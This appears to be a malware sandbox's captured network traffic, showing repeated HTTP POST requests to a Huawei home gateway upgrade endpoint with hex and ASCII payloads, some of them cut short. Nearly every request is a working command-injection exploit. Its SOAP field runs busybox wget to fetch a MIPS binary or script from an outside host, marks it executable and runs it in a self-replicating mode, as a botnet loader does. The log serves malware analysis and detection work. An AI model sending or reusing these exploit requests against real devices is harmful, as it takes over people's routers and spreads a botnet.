            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><
